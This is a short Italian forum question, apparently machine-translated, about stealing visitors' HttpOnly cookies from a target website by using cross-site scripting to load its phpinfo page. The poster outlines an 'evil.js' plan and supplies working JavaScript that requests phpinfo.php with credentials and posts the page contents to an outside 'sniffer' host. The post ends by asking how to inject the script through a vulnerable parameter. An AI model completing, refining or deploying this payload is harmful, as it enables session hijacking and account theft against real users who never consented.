phpinfo () mostra tutti i cookie, anche quelli httponly. Quindi la domanda è: come posso ricevere utenti cookis sul sito web di destinazione tramite xss con phpinfo? Il xss conterrà il codice che aprirà la pagina phpinfo in background (come un popunder) e quindi usando xhtmlRequest invierà il contenuto della pagina alla mia pagina web sniffer. La domanda è: non ho davvero molto caldo per metterlo insieme. Sto vedendo in questo modo:
- xss sarà containt
- evil.js aprirà xhtmlRequest GET per ottenere la pagina phpinfo con i dati dei cookie
- evil.js pubblicherà i dati sul mio sniffer
È questo il modo corretto per farlo o forse ci sono approcci più appropriati? Grazie!
UPD: ho scritto un esempio,
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
var body = encodeURIComponent(xhttp.responseText);
xhttp.open("POST", 'http://mysniff.ru/t.php', true)
xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
xhttp.send(body)
}
};
xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();
Funzionerà se includo questo codice come script src? O devo solo urlencode e passare a parametro vulnerabile per funzionare?